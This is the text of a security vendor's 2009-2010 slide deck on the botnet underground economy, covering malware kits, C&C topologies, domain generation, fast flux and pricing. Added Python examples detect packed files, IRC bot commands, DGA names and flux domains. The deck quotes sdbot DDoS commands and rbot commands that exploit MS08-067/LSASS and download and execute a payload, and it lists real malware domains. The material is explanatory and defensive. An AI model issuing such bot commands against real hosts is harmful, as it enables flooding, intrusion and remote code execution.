Your Computer Is Worth 30¢
This battle for control of your
Gunter Ollmann, Vice President of Research
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
About
Gunter Ollmann
• VP of Research, Damballa Inc.
Damballa Inc.
• Atlanta-based security company focused on enterprise detection and mitigation of botnets
Brief Bio:
• Two decades in the IT industry. Built and run international pentest teams, R&D groups and consulting practices around the world.
• Formerly Chief Security Strategist for IBM, Director of X-Force for ISS, Professional Services Director for NGS Software, Head of Attack Services EMEA, etc.
• http://blog.damballa.com & http://technicalinfodotnet.blogspot.com/
Perspective…
Targeted?
Targeted in what sense?
Targeted Attacks?
Access to the enterprise
• Submit a CV
• Hand out USB drives
• Purchase from botnet masters
[Timeline figure: 2000, 2005, 2009]
Different Ways of Looking at the Threat?
Serial Variants
• Code Metamorphism: Random changes to the code's structures and procedures.
• Noise Insertion: Insertion of noise instructions and whitespace commands.
• Compilers: Different compilers (and versions) are used to generate different code.
• Original Malware: Source-code or DIY malware creator kit generates original code.
Cryptors, Packers and Binders
• Original Malware: Source-code or DIY malware creator kit generates original code.
• Binders: Take the malware and bind it with(in) other innocuous software.
• Cryptors: Encrypt the malware, so it can only be decrypted in real-time on the host.
• Packers: Compress the malware to make it small, compact and random.
• QA: Automatically run the new malware through AV detection tests.
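The serial-variant and cryptor/packer slides explain why byte-signature matching keeps losing: every build differs, and the bound payload is compressed or encrypted until it runs. The one property a cryptor or packer cannot hide is the statistical flatness of its output, so a defender-side triage step is to measure entropy. The following Python is an added example written for this page, not Damballa's code or any product's logic; the "plain" and "packed" byte strings are constructed stand-ins (a repeated DOS-stub string and seeded pseudo-random bytes), not real samples, and the 7.0 bits/byte threshold and 512-byte window are illustrative choices.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Compressed or encrypted payloads approach 8 bits/byte; plain code and strings sit well below."""
    return shannon_entropy(data) >= threshold


def high_entropy_windows(data: bytes, window: int = 512, threshold: float = 7.0) -> list:
    """Offsets of fixed-size, non-overlapping windows whose entropy crosses the threshold.

    Locates an encrypted/compressed region embedded in otherwise plain content,
    which is the binder layout: innocuous carrier with a bound payload inside.
    """
    return [off for off in range(0, len(data) - window + 1, window)
            if shannon_entropy(data[off:off + window]) >= threshold]


# Constructed samples (not real malware): a text-heavy region standing in for
# unpacked code and strings, and seeded pseudo-random bytes standing in for a
# cryptor's output. Seeding keeps the run deterministic.
PLAIN_REGION = b"This program cannot be run in DOS mode. " * 64      # 2560 bytes
_rng = random.Random(1)
PACKED_REGION = bytes(_rng.getrandbits(8) for _ in range(4096))      # 4096 bytes
BOUND_SAMPLE = PLAIN_REGION + PACKED_REGION + PLAIN_REGION          # binder-style layout

if __name__ == "__main__":
    print("plain  region entropy:", round(shannon_entropy(PLAIN_REGION), 2))
    print("packed region entropy:", round(shannon_entropy(PACKED_REGION), 2))
    print("high-entropy windows at:", high_entropy_windows(BOUND_SAMPLE))
```

Whole-file entropy is enough to flag a fully packed executable; the windowed scan is what catches the binder case, where most of the file is a legitimate carrier and only a slice is encrypted. Neither check identifies the malware family, and legitimately compressed resources (images, installers) also score high, so treat a hit as a reason to unpack and inspect, not as a verdict.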
Avoiding analysis systems
Virus Testing
Bot spreading & Support
Command & Control Evolution
• Star Topology: Common clustering
• Hierarchical Topology: Easy to sell/rent branches
• Multi-server Topology: High resilience to shut-down
• Random: P2P, etc.
Botnet Command and Control
IRC Command and Control is still common for botnet management.
The command language varies with the nature of the botnet's capabilities.
Sample bot command sequences:
Sdbot/Reptile
1: .udp 208.43.216.195 1995 999999999999 -s
2: .ddos.ack 208.43.216.195 1995 9999999999999 -s
…typically used for DDoS
Rbots
1: scan.start ms08_067_netapi 25 3 download+exec x.x.x.x
2: .scan 75 1 201.x.x.x 2 1 201.x.x.x
3: .root.start lsass_445 100 3 0 -r -s
…scan hosts within a Class-A for port 443 and attempt to exploit (Conficker)
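Because IRC C&C carries its commands in clear-text PRIVMSG lines, a network sensor or IRC proxy log can be matched against the command grammar shown above. The following Python is an added example written for this page, not code from the deck or from any Damballa product; the IRC lines are constructed (documentation-range addresses, made-up nicks and channels), and the category names and regular expressions are this example's own, derived only from the sdbot/rbot commands quoted on the slide.

```python
import re

# Standard IRC PRIVMSG framing: ":nick!user@host PRIVMSG <target> :<text>"
IRC_PRIVMSG = re.compile(
    r"^:(?P<nick>[^!\s]+)!\S+\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")

# Command grammar taken from the sdbot/rbot samples on the slide; the category
# labels are our own. Leading dot is optional because "scan.start" appears without one.
BOT_COMMAND_PATTERNS = [
    ("ddos",    re.compile(r"^\.?(udp|ddos\.\w+)\b", re.I)),
    ("scan",    re.compile(r"^\.?scan(\.\w+)?\b", re.I)),
    ("exploit", re.compile(r"^\.?root\.start\b", re.I)),
    ("loader",  re.compile(r"\bdownload\+exec\b", re.I)),
]


def parse_privmsg(line: str):
    """Return nick/target/text for a PRIVMSG line, or None for any other IRC message."""
    m = IRC_PRIVMSG.match(line.strip())
    return m.groupdict() if m else None


def classify_command(text: str) -> list:
    """Categories whose pattern matches the message body (empty list for ordinary chat)."""
    text = text.strip()
    return [name for name, pattern in BOT_COMMAND_PATTERNS if pattern.search(text)]


def scan_irc_log(lines) -> list:
    """Walk raw IRC lines and collect messages that look like bot commands."""
    hits = []
    for line in lines:
        msg = parse_privmsg(line)
        if not msg:
            continue
        categories = classify_command(msg["text"])
        if categories:
            hits.append({"nick": msg["nick"], "target": msg["target"],
                         "categories": categories, "text": msg["text"]})
    return hits


# Constructed log lines (not captured traffic); 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.
RAW_IRC_LOG = [
    ":master!op@192.0.2.1 PRIVMSG #bots :.udp 192.0.2.50 1995 999999999 -s",
    ":master!op@192.0.2.1 PRIVMSG #bots :scan.start ms08_067_netapi 25 3 download+exec 192.0.2.9",
    ":master!op@192.0.2.1 PRIVMSG #bots :.root.start lsass_445 100 3 0 -r -s",
    ":alice!a@198.51.100.7 PRIVMSG #chat :hey, did the build finish?",
    "PING :irc.example.net",
]

if __name__ == "__main__":
    for hit in scan_irc_log(RAW_IRC_LOG):
        print(hit["nick"], hit["target"], hit["categories"], "|", hit["text"])
```

The patterns are deliberately narrow (the exact verbs the slide shows) so that ordinary channel chatter does not match; a real deployment would widen them per family and pair the match with the channel join and the bot's greeting so that a single false hit on a human typing ".scan" does not page anyone.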
IRC CnC Host Controls
[Figure: command tables for SpyBot, SDbot and Agobot]
Zeus & Distribution
ZEUS DIY Kit
• RRP: $400 (street price ~$50)
• Botnet CnC package with Web management frontend.
• Very popular – many plug-ins developed to extend functionality
Sophisticated Management
Visibility…
Keylogger Octopus
Basic DIY kit
• Evolution of free kit (incl. source code)
• $30 for commercial version
RAT Spy-Net v1.8
RAT Aero-Rat v0.3
RAT Turkojan v4
Trojan creator
V.4 New features
• Remote Desktop
• Webcam Streaming
• Audio Streaming
• Remote passwords
• MSN Sniffer
• Remote Shell
• Advanced File Manager
• Online & Offline keylogger
• Information about remote computer
• Etc..
Three versions
• Gold, Silver & Bronze
RAT PayDay v0.11
Hire-a-Malware-Coder (Custom Build)
Platform: software running on MAC OS to Windows
Multitasking: have the capacity to work on multiple projects
Speed and responsibility: at the highest level
Pre-payment for new customers: 50% of the whole price, 30% pre-pay of the whole price for repeated customers
Rates: starting from 100 euros
I can also offer you another deal, I will share the complete source code in exchange for access to a botnet with at least 4000 infected hosts because I don't have time to play around with my bot right now.
Hire-a-malware-coder Pricing
Other models exist for hire-a-malware-coder pricing
Component/functionality based pricing
• Loader: 300
• FTP & Grabber: 150
• Assembler Spam bases: 220
• Socks 4/5: 70
• Botnet manager: 600
• Scripts: 70
• Password stealers (IE, MSN, etc.): 70
• AV-remover: 70
• Screen-grabber: 70
Competition…
Builder Battling
Zeus: World's most popular DIY malware construction kit
Helps clear your system before making the malware
Battling at the Victims Host
Similar kit to Zeus
Dynamic Domain Generation
Designed to thwart domain hijacking/closure
Sinowal: fhwwhkis.com, fhksvbjj.com, kixxgxhi.com, dfhkxefj.biz, xchtucfx.com, ehbcihsg.com, htiukhwb.com, xddjsvgh.com, ivfjxxgf.com, icdkvcjf.com
Bobax/Torpig: cfzxkefy.2mydns.net, ozzlcjfwxy.mykgb.com, uavpmphb.zipitover.com, nltngl.widescreenhd.tv, mohuajixthb.afraid.org, vemogoftiv.zipitover.com, fwsdqcxozwi.mycoding.com, iaguaku.afraid.org, pxkakigmdx.mario.org, zxeytdqgn.mario.org
Conficker A/B: jstlzaccs.cc, kupgc.info, gyagluso.info, ezffoozq.biz, hxqbgkyw.org, nxmezijg.info, sayklyqfhk.org, eplgu.org, hlgkiyogcgs.ws, oyvtk.cn
Conficker C: bjxqjh.com.sv, dgtqwe.be, cnxnp.com.py, btuutlevt.com.mt, bmjlezym.com.pe, bynzomen.com.mx, daagsup.com.bo, cequxn.ca, cxcsicbqn.ch, dcmrfv.gs
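The four domain lists above share a property a defender can score for: the generated label is a string of letters no human would register, short on vowels and long on consonant runs. The following Python is an added example for this page, not Damballa's detection logic; it scores the leftmost label with two hand-picked features (vowel ratio and longest consonant run), and the thresholds (0.25, 4, minimum length 5) are this example's own choices. The Sinowal list is taken from the slide; the benign list is constructed for contrast.

```python
VOWELS = set("aeiou")


def dga_label(domain: str) -> str:
    """Leftmost label once 'www.' and any trailing dot are stripped.

    In all four families above the generated part is the leftmost label: the apex
    for Sinowal and Conficker, a subdomain under a dynamic-DNS zone for Bobax/Torpig.
    """
    d = domain.strip().lower().rstrip(".")
    if d.startswith("www."):
        d = d[4:]
    return d.split(".")[0]


def label_features(label: str) -> dict:
    """Length, vowel ratio over letters, and longest run of consecutive consonants."""
    letters = [c for c in label if c.isalpha()]
    vowels = sum(1 for c in letters if c in VOWELS)
    run = best = 0
    for c in label:
        if c.isalpha() and c not in VOWELS:   # 'y' and digits count as non-vowel / break
            run += 1
            best = max(best, run)
        else:
            run = 0
    return {"length": len(label),
            "vowel_ratio": vowels / len(letters) if letters else 0.0,
            "max_consonant_run": best}


def is_likely_dga(domain: str, min_length: int = 5) -> bool:
    """Crude lexical test: too few vowels or an unpronounceable consonant run."""
    f = label_features(dga_label(domain))
    if f["length"] < min_length:
        return False
    return f["vowel_ratio"] <= 0.25 or f["max_consonant_run"] >= 4


def flag_dga(domains) -> list:
    return [d for d in domains if is_likely_dga(d)]


# Sinowal sample domains as listed on the slide.
SINOWAL_SAMPLES = ["fhwwhkis.com", "fhksvbjj.com", "kixxgxhi.com", "dfhkxefj.biz",
                   "xchtucfx.com", "ehbcihsg.com", "htiukhwb.com", "xddjsvgh.com",
                   "ivfjxxgf.com", "icdkvcjf.com"]
# Constructed benign contrast set.
BENIGN_SAMPLES = ["www.google.com", "microsoft.com", "damballa.com", "wikipedia.org"]

if __name__ == "__main__":
    for d in SINOWAL_SAMPLES + BENIGN_SAMPLES:
        print(f"{d:22} {label_features(dga_label(d))}  dga={is_likely_dga(d)}")
```

Two features catch every Sinowal domain on the slide but deliberately leave the pronounceable Conficker A/B names (gyagluso, sayklyqfhk) unflagged, and short consonant-heavy brands such as "flickr" would trip the vowel test. Lexical scoring is therefore a pre-filter: the strong signal is behavioural, a host resolving dozens of such names in a row with NXDOMAIN answers for most of them, which is what the domain-flux design is forced to produce.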
Blacklisted Researchers
Hack-back
Curiosity killed the cat
• Turn botnet against CnC investigators
Identifying the researcher
• Repeated lookup of name servers
• Resolution request for CnC host name
• Wrong port/protocol in CnC connection
• Missing handshake or keys
• Identify sandbox/VM being used
Response tactics
• DDoS the IP address or netblock
• Spam flood the researcher
• Exploit and breakout of sandbox/VM
• Give different (benign) responses to the researcher
Value…
How to pay
Where to look
Mechanisms for validation of buyer/seller
Making Money With Botnets
Business Motivators for Bot Masters
• Active market for purchase/sale of corporate hosts: $500-$20,000 per host
• Markets for the data stolen from botnet hosts: authentication credentials and PII
• Buying/selling stolen documents
• Blackhat services: noisy, high-volume, low-profit spam, DDoS, brute-force; stealthy click-fraud, corporate identity enumeration
• Reputation hijacking: running blackhat services that leverage corporate reputation
Buying Botnet Victims
Worth less than you imagine
How much? 1/400th of a cent per 24 hours
Value-added Services
iFrame Traffic
URL Management
Lookup Resilience
IP Flux
• Single-flux
• Double-flux
Domain Flux
• Domain wildcarding
• Domain generation algorithms
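The IP-flux bullets describe two DNS patterns that show up directly in resolver logs: single-flux, where the A records of the C&C name rotate through many addresses on short TTLs, and double-flux, where the name servers for the zone rotate the same way. The following Python is an added example written for this page, not Damballa's detector; the resolver log is constructed (documentation-range addresses, `.test` names), the record format is this example's own, and the thresholds (five distinct addresses, TTL at most 300 s, three distinct name-server addresses) are illustrative. A production check would also count the ASNs behind those addresses, which a log like this does not carry.

```python
from collections import defaultdict

# Constructed resolver log, one answer per line: timestamp qname rtype rdata ttl
RESOLVER_LOG = """\
2009-11-03T10:00:00 flux-example.test A 192.0.2.11 60
2009-11-03T10:01:00 flux-example.test A 192.0.2.57 60
2009-11-03T10:02:00 flux-example.test A 192.0.2.130 60
2009-11-03T10:03:00 flux-example.test A 192.0.2.201 60
2009-11-03T10:04:00 flux-example.test A 192.0.2.78 60
2009-11-03T10:05:00 flux-example.test A 192.0.2.9 60
2009-11-03T10:00:00 flux-example.test NS ns1.flux-example.test 60
2009-11-03T10:00:00 ns1.flux-example.test A 198.51.100.5 60
2009-11-03T10:03:00 ns1.flux-example.test A 198.51.100.77 60
2009-11-03T10:06:00 ns1.flux-example.test A 198.51.100.140 60
2009-11-03T10:00:00 single-example.test A 192.0.2.21 120
2009-11-03T10:02:00 single-example.test A 192.0.2.22 120
2009-11-03T10:04:00 single-example.test A 192.0.2.23 120
2009-11-03T10:06:00 single-example.test A 192.0.2.24 120
2009-11-03T10:08:00 single-example.test A 192.0.2.25 120
2009-11-03T10:00:00 single-example.test NS ns1.single-example.test 3600
2009-11-03T10:00:00 ns1.single-example.test A 203.0.113.2 3600
2009-11-03T10:00:00 static-example.test A 203.0.113.10 86400
2009-11-03T11:00:00 static-example.test A 203.0.113.10 86400
2009-11-03T10:00:00 static-example.test NS ns1.static-example.test 86400
2009-11-03T10:00:00 ns1.static-example.test A 203.0.113.9 86400
"""


def parse_log(text: str) -> list:
    """Split the constructed log into answer records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, qname, rtype, rdata, ttl = line.split()
        records.append({"ts": ts, "qname": qname.lower(), "rtype": rtype,
                        "rdata": rdata.lower(), "ttl": int(ttl)})
    return records


def build_profiles(records) -> dict:
    """Per name: distinct A addresses, NS hostnames, and the smallest A TTL seen."""
    profiles = defaultdict(lambda: {"a_ips": set(), "ns_names": set(), "min_a_ttl": None})
    for r in records:
        p = profiles[r["qname"]]
        if r["rtype"] == "A":
            p["a_ips"].add(r["rdata"])
            p["min_a_ttl"] = r["ttl"] if p["min_a_ttl"] is None else min(p["min_a_ttl"], r["ttl"])
        elif r["rtype"] == "NS":
            p["ns_names"].add(r["rdata"])
    return profiles


def classify(domain: str, profiles: dict, ip_threshold: int = 5, ttl_threshold: int = 300) -> str:
    """'single-flux' when the name's A records churn on short TTLs; 'double-flux' when
    the zone's name servers churn as well; otherwise 'stable'."""
    p = profiles[domain]
    a_flux = (len(p["a_ips"]) >= ip_threshold
              and p["min_a_ttl"] is not None and p["min_a_ttl"] <= ttl_threshold)
    if not a_flux:
        return "stable"
    ns_ips = set()
    for ns in p["ns_names"]:
        ns_profile = profiles.get(ns)
        if ns_profile:
            ns_ips |= ns_profile["a_ips"]
    return "double-flux" if len(ns_ips) >= 3 else "single-flux"


def classify_all(records) -> dict:
    """Classify every name for which NS records were observed (the zone apexes)."""
    profiles = build_profiles(records)
    return {name: classify(name, profiles) for name, p in profiles.items() if p["ns_names"]}


if __name__ == "__main__":
    for name, verdict in classify_all(parse_log(RESOLVER_LOG)).items():
        print(f"{name:24} {verdict}")
```

Large CDNs also answer with many addresses on short TTLs, which is why the address-count test alone is noisy; the double-flux test is the more specific one, since legitimate zones almost never move their name servers between unrelated consumer address blocks every few minutes.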
Umm…
Conclusions
Gunter Ollmann - VP of Research
[email protected]
WWW – http://www.damballa.com
Blog - http://blog.damballa.com
Blog - http://technicalinfodotnet.blogspot.com
Thank You!